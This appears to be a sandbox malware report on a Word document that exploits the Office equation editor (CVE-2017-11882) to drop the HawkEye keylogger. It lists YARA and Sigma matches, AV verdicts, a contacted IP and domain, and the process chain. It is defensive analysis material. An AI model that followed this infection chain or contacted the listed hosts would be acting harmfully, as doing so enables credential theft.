4.2.name.exe.3f3adda.17.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b29:$hawkstr1: HawkEye Keylogger 0x7696a:$hawkstr1: HawkEye Keylogger 0x76c99:$hawkstr1: HawkEye Keylogger 0x76df4:$hawkstr1: HawkEye Keylogger 0x76f57:$hawkstr1: HawkEye Keylogger 0x771d0:$hawkstr1: HawkEye Keylogger 0xf7de7:$hawkstr1: HawkEye Keylogger 0xf8c28:$hawkstr1: HawkEye Keylogger 0xf8f57:$hawkstr1: HawkEye Keylogger 0xf90b2:$hawkstr1: HawkEye Keylogger 0xf9215:$hawkstr1: HawkEye Keylogger 0xf948e:$hawkstr1: HawkEye Keylogger 0x756b7:$hawkstr2: Dear HawkEye Customers! 0x76cec:$hawkstr2: Dear HawkEye Customers! 0x76e43:$hawkstr2: Dear HawkEye Customers! 0x76faa:$hawkstr2: Dear HawkEye Customers! 0xf7975:$hawkstr2: Dear HawkEye Customers! 0xf8faa:$hawkstr2: Dear HawkEye Customers! 0xf9101:$hawkstr2: Dear HawkEye Customers! 0xf9268:$hawkstr2: Dear HawkEye Customers! 0x757d8:$hawkstr3: HawkEye Logger Details:
4.2.name.exe.3d2bea2.13.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x79ac0:$key: HawkEyeKeylogger 0x7bcbe:$salt: 099u787978786 0x7a0d9:$string1: HawkEye_Keylogger 0x7af2c:$string1: HawkEye_Keylogger 0x7bc1e:$string1: HawkEye_Keylogger 0x7a4c2:$string2: holdermail.txt 0x7a4e2:$string2: holdermail.txt 0x7a404:$string3: wallet.dat 0x7a41c:$string3: wallet.dat 0x7a432:$string3: wallet.dat 0x7b800:$string4: Keylog Records 0x7bb18:$string4: Keylog Records 0x7bd16:$string5: do not script --> 0x79aa8:$string6: \pidloc.txt 0x79b0e:$string7: BSPLIT 0x79b1e:$string7: BSPLIT
4.2.name.exe.3d2bea2.13.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x5623:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.name.exe.3d2bea2.13.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3d2bea2.13.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.name.exe.3d2bea2.13.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3d2bea2.13.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7a131:$hawkstr1: HawkEye Keylogger 0x7af72:$hawkstr1: HawkEye Keylogger 0x7b2a1:$hawkstr1: HawkEye Keylogger 0x7b3fc:$hawkstr1: HawkEye Keylogger 0x7b55f:$hawkstr1: HawkEye Keylogger 0x7b7d8:$hawkstr1: HawkEye Keylogger 0x79cbf:$hawkstr2: Dear HawkEye Customers! 0x7b2f4:$hawkstr2: Dear HawkEye Customers! 0x7b44b:$hawkstr2: Dear HawkEye Customers! 0x7b5b2:$hawkstr2: Dear HawkEye Customers! 0x79de0:$hawkstr3: HawkEye Logger Details:
5.2.InstallUtil.exe.409c0d.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73ab3:$key: HawkEyeKeylogger 0x75cb1:$salt: 099u787978786 0x740cc:$string1: HawkEye_Keylogger 0x74f1f:$string1: HawkEye_Keylogger 0x75c11:$string1: HawkEye_Keylogger 0x744b5:$string2: holdermail.txt 0x744d5:$string2: holdermail.txt 0x743f7:$string3: wallet.dat 0x7440f:$string3: wallet.dat 0x74425:$string3: wallet.dat 0x757f3:$string4: Keylog Records 0x75b0b:$string4: Keylog Records 0x75d09:$string5: do not script --> 0x73a9b:$string6: \pidloc.txt 0x73b01:$string7: BSPLIT 0x73b11:$string7: BSPLIT
5.2.InstallUtil.exe.409c0d.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
5.2.InstallUtil.exe.409c0d.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
5.2.InstallUtil.exe.409c0d.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
5.2.InstallUtil.exe.409c0d.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74124:$hawkstr1: HawkEye Keylogger 0x74f65:$hawkstr1: HawkEye Keylogger 0x75294:$hawkstr1: HawkEye Keylogger 0x753ef:$hawkstr1: HawkEye Keylogger 0x75552:$hawkstr1: HawkEye Keylogger 0x757cb:$hawkstr1: HawkEye Keylogger 0x73cb2:$hawkstr2: Dear HawkEye Customers! 0x752e7:$hawkstr2: Dear HawkEye Customers! 0x7543e:$hawkstr2: Dear HawkEye Customers! 0x755a5:$hawkstr2: Dear HawkEye Customers! 0x73dd3:$hawkstr3: HawkEye Logger Details:
7.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3f349d2.16.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8c0:$key: HawkEyeKeylogger 0xfdb7e:$key: HawkEyeKeylogger 0x7dabe:$salt: 099u787978786 0xffd7c:$salt: 099u787978786 0x7bed9:$string1: HawkEye_Keylogger 0x7cd2c:$string1: HawkEye_Keylogger 0x7da1e:$string1: HawkEye_Keylogger 0xfe197:$string1: HawkEye_Keylogger 0xfefea:$string1: HawkEye_Keylogger 0xffcdc:$string1: HawkEye_Keylogger 0x7c2c2:$string2: holdermail.txt 0x7c2e2:$string2: holdermail.txt 0xfe580:$string2: holdermail.txt 0xfe5a0:$string2: holdermail.txt 0x7c204:$string3: wallet.dat 0x7c21c:$string3: wallet.dat 0x7c232:$string3: wallet.dat 0xfe4c2:$string3: wallet.dat 0xfe4da:$string3: wallet.dat 0xfe4f0:$string3: wallet.dat 0x7d600:$string4: Keylog Records
4.2.name.exe.3f349d2.16.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x896e1:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.name.exe.3f349d2.16.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3f349d2.16.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.name.exe.3f349d2.16.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3f349d2.16.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf31:$hawkstr1: HawkEye Keylogger 0x7cd72:$hawkstr1: HawkEye Keylogger 0x7d0a1:$hawkstr1: HawkEye Keylogger 0x7d1fc:$hawkstr1: HawkEye Keylogger 0x7d35f:$hawkstr1: HawkEye Keylogger 0x7d5d8:$hawkstr1: HawkEye Keylogger 0xfe1ef:$hawkstr1: HawkEye Keylogger 0xff030:$hawkstr1: HawkEye Keylogger 0xff35f:$hawkstr1: HawkEye Keylogger 0xff4ba:$hawkstr1: HawkEye Keylogger 0xff61d:$hawkstr1: HawkEye Keylogger 0xff896:$hawkstr1: HawkEye Keylogger 0x7babf:$hawkstr2: Dear HawkEye Customers! 0x7d0f4:$hawkstr2: Dear HawkEye Customers! 0x7d24b:$hawkstr2: Dear HawkEye Customers! 0x7d3b2:$hawkstr2: Dear HawkEye Customers! 0xfdd7d:$hawkstr2: Dear HawkEye Customers! 0xff3b2:$hawkstr2: Dear HawkEye Customers! 0xff509:$hawkstr2: Dear HawkEye Customers! 0xff670:$hawkstr2: Dear HawkEye Customers! 0x7bbe0:$hawkstr3: HawkEye Logger Details:
4.2.name.exe.3b9e738.11.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x754b8:$key: HawkEyeKeylogger 0x776b6:$salt: 099u787978786 0x75ad1:$string1: HawkEye_Keylogger 0x76924:$string1: HawkEye_Keylogger 0x77616:$string1: HawkEye_Keylogger 0x75eba:$string2: holdermail.txt 0x75eda:$string2: holdermail.txt 0x75dfc:$string3: wallet.dat 0x75e14:$string3: wallet.dat 0x75e2a:$string3: wallet.dat 0x771f8:$string4: Keylog Records 0x77510:$string4: Keylog Records 0x7770e:$string5: do not script --> 0x754a0:$string6: \pidloc.txt 0x75506:$string7: BSPLIT 0x75516:$string7: BSPLIT
4.2.name.exe.3b9e738.11.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.name.exe.3b9e738.11.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3b9e738.11.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.name.exe.3b9e738.11.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3b9e738.11.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b29:$hawkstr1: HawkEye Keylogger 0x7696a:$hawkstr1: HawkEye Keylogger 0x76c99:$hawkstr1: HawkEye Keylogger 0x76df4:$hawkstr1: HawkEye Keylogger 0x76f57:$hawkstr1: HawkEye Keylogger 0x771d0:$hawkstr1: HawkEye Keylogger 0x756b7:$hawkstr2: Dear HawkEye Customers! 0x76cec:$hawkstr2: Dear HawkEye Customers! 0x76e43:$hawkstr2: Dear HawkEye Customers! 0x76faa:$hawkstr2: Dear HawkEye Customers! 0x757d8:$hawkstr3: HawkEye Logger Details:
5.2.InstallUtil.exe.33394d0.11.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3ba013d.9.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73ab3:$key: HawkEyeKeylogger 0x75cb1:$salt: 099u787978786 0x740cc:$string1: HawkEye_Keylogger 0x74f1f:$string1: HawkEye_Keylogger 0x75c11:$string1: HawkEye_Keylogger 0x744b5:$string2: holdermail.txt 0x744d5:$string2: holdermail.txt 0x743f7:$string3: wallet.dat 0x7440f:$string3: wallet.dat 0x74425:$string3: wallet.dat 0x757f3:$string4: Keylog Records 0x75b0b:$string4: Keylog Records 0x75d09:$string5: do not script --> 0x73a9b:$string6: \pidloc.txt 0x73b01:$string7: BSPLIT 0x73b11:$string7: BSPLIT
4.2.name.exe.3ba013d.9.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3ba013d.9.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.name.exe.3ba013d.9.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3ba013d.9.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74124:$hawkstr1: HawkEye Keylogger 0x74f65:$hawkstr1: HawkEye Keylogger 0x75294:$hawkstr1: HawkEye Keylogger 0x753ef:$hawkstr1: HawkEye Keylogger 0x75552:$hawkstr1: HawkEye Keylogger 0x757cb:$hawkstr1: HawkEye Keylogger 0x73cb2:$hawkstr2: Dear HawkEye Customers! 0x752e7:$hawkstr2: Dear HawkEye Customers! 0x7543e:$hawkstr2: Dear HawkEye Customers! 0x755a5:$hawkstr2: Dear HawkEye Customers! 0x73dd3:$hawkstr3: HawkEye Logger Details:
6.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
5.2.InstallUtil.exe.33516f0.12.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3f3c7df.15.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73ab3:$key: HawkEyeKeylogger 0xf5d71:$key: HawkEyeKeylogger 0x75cb1:$salt: 099u787978786 0xf7f6f:$salt: 099u787978786 0x740cc:$string1: HawkEye_Keylogger 0x74f1f:$string1: HawkEye_Keylogger 0x75c11:$string1: HawkEye_Keylogger 0xf638a:$string1: HawkEye_Keylogger 0xf71dd:$string1: HawkEye_Keylogger 0xf7ecf:$string1: HawkEye_Keylogger 0x744b5:$string2: holdermail.txt 0x744d5:$string2: holdermail.txt 0xf6773:$string2: holdermail.txt 0xf6793:$string2: holdermail.txt 0x743f7:$string3: wallet.dat 0x7440f:$string3: wallet.dat 0x74425:$string3: wallet.dat 0xf66b5:$string3: wallet.dat 0xf66cd:$string3: wallet.dat 0xf66e3:$string3: wallet.dat 0x757f3:$string4: Keylog Records
4.2.name.exe.3f3c7df.15.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x818d4:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.name.exe.3f3c7df.15.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3f3c7df.15.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.name.exe.3f3c7df.15.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3f3c7df.15.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74124:$hawkstr1: HawkEye Keylogger 0x74f65:$hawkstr1: HawkEye Keylogger 0x75294:$hawkstr1: HawkEye Keylogger 0x753ef:$hawkstr1: HawkEye Keylogger 0x75552:$hawkstr1: HawkEye Keylogger 0x757cb:$hawkstr1: HawkEye Keylogger 0xf63e2:$hawkstr1: HawkEye Keylogger 0xf7223:$hawkstr1: HawkEye Keylogger 0xf7552:$hawkstr1: HawkEye Keylogger 0xf76ad:$hawkstr1: HawkEye Keylogger 0xf7810:$hawkstr1: HawkEye Keylogger 0xf7a89:$hawkstr1: HawkEye Keylogger 0x73cb2:$hawkstr2: Dear HawkEye Customers! 0x752e7:$hawkstr2: Dear HawkEye Customers! 0x7543e:$hawkstr2: Dear HawkEye Customers! 0x755a5:$hawkstr2: Dear HawkEye Customers! 0xf5f70:$hawkstr2: Dear HawkEye Customers! 0xf75a5:$hawkstr2: Dear HawkEye Customers! 0xf76fc:$hawkstr2: Dear HawkEye Customers! 0xf7863:$hawkstr2: Dear HawkEye Customers! 0x73dd3:$hawkstr3: HawkEye Logger Details:
5.2.InstallUtil.exe.33394d0.11.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
5.2.InstallUtil.exe.33394d0.11.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3d33caf.12.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73ab3:$key: HawkEyeKeylogger 0xf5d93:$key: HawkEyeKeylogger 0x178063:$key: HawkEyeKeylogger 0x75cb1:$salt: 099u787978786 0xf7f91:$salt: 099u787978786 0x17a261:$salt: 099u787978786 0x740cc:$string1: HawkEye_Keylogger 0x74f1f:$string1: HawkEye_Keylogger 0x75c11:$string1: HawkEye_Keylogger 0xf63ac:$string1: HawkEye_Keylogger 0xf71ff:$string1: HawkEye_Keylogger 0xf7ef1:$string1: HawkEye_Keylogger 0x17867c:$string1: HawkEye_Keylogger 0x1794cf:$string1: HawkEye_Keylogger 0x17a1c1:$string1: HawkEye_Keylogger 0x744b5:$string2: holdermail.txt 0x744d5:$string2: holdermail.txt 0xf6795:$string2: holdermail.txt 0xf67b5:$string2: holdermail.txt 0x178a65:$string2: holdermail.txt 0x178a85:$string2: holdermail.txt
4.2.name.exe.3d33caf.12.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x818f6:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x103bc6:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.name.exe.3d33caf.12.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3d33caf.12.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.name.exe.3d33caf.12.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3d33caf.12.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74124:$hawkstr1: HawkEye Keylogger 0x74f65:$hawkstr1: HawkEye Keylogger 0x75294:$hawkstr1: HawkEye Keylogger 0x753ef:$hawkstr1: HawkEye Keylogger 0x75552:$hawkstr1: HawkEye Keylogger 0x757cb:$hawkstr1: HawkEye Keylogger 0xf6404:$hawkstr1: HawkEye Keylogger 0xf7245:$hawkstr1: HawkEye Keylogger 0xf7574:$hawkstr1: HawkEye Keylogger 0xf76cf:$hawkstr1: HawkEye Keylogger 0xf7832:$hawkstr1: HawkEye Keylogger 0xf7aab:$hawkstr1: HawkEye Keylogger 0x1786d4:$hawkstr1: HawkEye Keylogger 0x179515:$hawkstr1: HawkEye Keylogger 0x179844:$hawkstr1: HawkEye Keylogger 0x17999f:$hawkstr1: HawkEye Keylogger 0x179b02:$hawkstr1: HawkEye Keylogger 0x179d7b:$hawkstr1: HawkEye Keylogger 0x73cb2:$hawkstr2: Dear HawkEye Customers! 0x752e7:$hawkstr2: Dear HawkEye Customers! 0x7543e:$hawkstr2: Dear HawkEye Customers!
5.2.InstallUtil.exe.2364e0c.8.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x564f:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
5.2.InstallUtil.exe.2369440.10.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
5.2.InstallUtil.exe.235347c.9.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x129ab:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x16fdf:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
5.2.InstallUtil.exe.235347c.9.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
5.2.InstallUtil.exe.235347c.9.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0xdb1c:$hawkstr1: HawkEye Keylogger 0x10ebc:$hawkstr1: HawkEye Keylogger 0x1123c:$hawkstr1: HawkEye Keylogger 0x15d2c:$hawkstr1: HawkEye Keylogger 0x1868c:$hawkstr1: HawkEye Keylogger 0xd5d4:$hawkstr2: Dear HawkEye Customers! 0x10f1c:$hawkstr2: Dear HawkEye Customers! 0x1129c:$hawkstr2: Dear HawkEye Customers! 0x186e8:$hawkstr2: Dear HawkEye Customers! 0xd702:$hawkstr3: HawkEye Logger Details:
4.2.name.exe.3d2bea2.13.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8c0:$key: HawkEyeKeylogger 0xfdba0:$key: HawkEyeKeylogger 0x17fe70:$key: HawkEyeKeylogger 0x7dabe:$salt: 099u787978786 0xffd9e:$salt: 099u787978786 0x18206e:$salt: 099u787978786 0x7bed9:$string1: HawkEye_Keylogger 0x7cd2c:$string1: HawkEye_Keylogger 0x7da1e:$string1: HawkEye_Keylogger 0xfe1b9:$string1: HawkEye_Keylogger 0xff00c:$string1: HawkEye_Keylogger 0xffcfe:$string1: HawkEye_Keylogger 0x180489:$string1: HawkEye_Keylogger 0x1812dc:$string1: HawkEye_Keylogger 0x181fce:$string1: HawkEye_Keylogger 0x7c2c2:$string2: holdermail.txt 0x7c2e2:$string2: holdermail.txt 0xfe5a2:$string2: holdermail.txt 0xfe5c2:$string2: holdermail.txt 0x180872:$string2: holdermail.txt 0x180892:$string2: holdermail.txt
4.2.name.exe.3d2bea2.13.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x89703:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x10b9d3:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.name.exe.3d2bea2.13.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3d2bea2.13.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.name.exe.3d2bea2.13.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3d2bea2.13.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf31:$hawkstr1: HawkEye Keylogger 0x7cd72:$hawkstr1: HawkEye Keylogger 0x7d0a1:$hawkstr1: HawkEye Keylogger 0x7d1fc:$hawkstr1: HawkEye Keylogger 0x7d35f:$hawkstr1: HawkEye Keylogger 0x7d5d8:$hawkstr1: HawkEye Keylogger 0xfe211:$hawkstr1: HawkEye Keylogger 0xff052:$hawkstr1: HawkEye Keylogger 0xff381:$hawkstr1: HawkEye Keylogger 0xff4dc:$hawkstr1: HawkEye Keylogger 0xff63f:$hawkstr1: HawkEye Keylogger 0xff8b8:$hawkstr1: HawkEye Keylogger 0x1804e1:$hawkstr1: HawkEye Keylogger 0x181322:$hawkstr1: HawkEye Keylogger 0x181651:$hawkstr1: HawkEye Keylogger 0x1817ac:$hawkstr1: HawkEye Keylogger 0x18190f:$hawkstr1: HawkEye Keylogger 0x181b88:$hawkstr1: HawkEye Keylogger 0x7babf:$hawkstr2: Dear HawkEye Customers! 0x7d0f4:$hawkstr2: Dear HawkEye Customers! 0x7d24b:$hawkstr2: Dear HawkEye Customers!
4.2.name.exe.3d322aa.14.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x754b8:$key: HawkEyeKeylogger 0xf7798:$key: HawkEyeKeylogger 0x179a68:$key: HawkEyeKeylogger 0x776b6:$salt: 099u787978786 0xf9996:$salt: 099u787978786 0x17bc66:$salt: 099u787978786 0x75ad1:$string1: HawkEye_Keylogger 0x76924:$string1: HawkEye_Keylogger 0x77616:$string1: HawkEye_Keylogger 0xf7db1:$string1: HawkEye_Keylogger 0xf8c04:$string1: HawkEye_Keylogger 0xf98f6:$string1: HawkEye_Keylogger 0x17a081:$string1: HawkEye_Keylogger 0x17aed4:$string1: HawkEye_Keylogger 0x17bbc6:$string1: HawkEye_Keylogger 0x75eba:$string2: holdermail.txt 0x75eda:$string2: holdermail.txt 0xf819a:$string2: holdermail.txt 0xf81ba:$string2: holdermail.txt 0x17a46a:$string2: holdermail.txt 0x17a48a:$string2: holdermail.txt
4.2.name.exe.3d322aa.14.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x832fb:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x1055cb:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.name.exe.3d322aa.14.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3d322aa.14.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.name.exe.3d322aa.14.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3d322aa.14.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b29:$hawkstr1: HawkEye Keylogger 0x7696a:$hawkstr1: HawkEye Keylogger 0x76c99:$hawkstr1: HawkEye Keylogger 0x76df4:$hawkstr1: HawkEye Keylogger 0x76f57:$hawkstr1: HawkEye Keylogger 0x771d0:$hawkstr1: HawkEye Keylogger 0xf7e09:$hawkstr1: HawkEye Keylogger 0xf8c4a:$hawkstr1: HawkEye Keylogger 0xf8f79:$hawkstr1: HawkEye Keylogger 0xf90d4:$hawkstr1: HawkEye Keylogger 0xf9237:$hawkstr1: HawkEye Keylogger 0xf94b0:$hawkstr1: HawkEye Keylogger 0x17a0d9:$hawkstr1: HawkEye Keylogger 0x17af1a:$hawkstr1: HawkEye Keylogger 0x17b249:$hawkstr1: HawkEye Keylogger 0x17b3a4:$hawkstr1: HawkEye Keylogger 0x17b507:$hawkstr1: HawkEye Keylogger 0x17b780:$hawkstr1: HawkEye Keylogger 0x756b7:$hawkstr2: Dear HawkEye Customers! 0x76cec:$hawkstr2: Dear HawkEye Customers! 0x76e43:$hawkstr2: Dear HawkEye Customers!
Click to see the 101 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 103.255.237.180, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2232, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2232, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UPDATED-08102021.PDF[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\user\AppData\Roaming\name.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\name.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\name.exe, NewProcessName: C:\Users\user\AppData\Roaming\name.exe, OriginalFileName: C:\Users\user\AppData\Roaming\name.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2232, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\name.exe' , ProcessId: 1708

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\name.exe' , ParentImage: C:\Users\user\AppData\Roaming\name.exe, ParentProcessId: 1708, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ProcessId: 752

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus / Scanner detection for submitted sample

Show sources

Source: New Updated 20210810.doc

Avira: detected

Found malware configuration

Show sources

Source: vbc.exe.1756.7.memstrmin

Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}

Multi AV Scanner detection for domain / URL

Show sources

Source: vecvietnam.com.vn

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UPDATED-08102021.PDF[1].exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Roaming\name.exe	ReversingLabs: Detection: 35%

Multi AV Scanner detection for submitted file

Show sources

Source: New Updated 20210810.doc

ReversingLabs: Detection: 39%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\name.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UPDATED-08102021.PDF[1].exe	Joe Sandbox ML: detected

Source: 5.2.InstallUtil.exe.400000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 5.2.InstallUtil.exe.400000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 4.2.name.exe.3f349d2.16.unpack	Avira: Label: TR/Inject.vcoldi
Source: 4.2.name.exe.3d2bea2.13.unpack	Avira: Label: TR/Inject.vcoldi

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\name.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\name.exe

Source: unknown

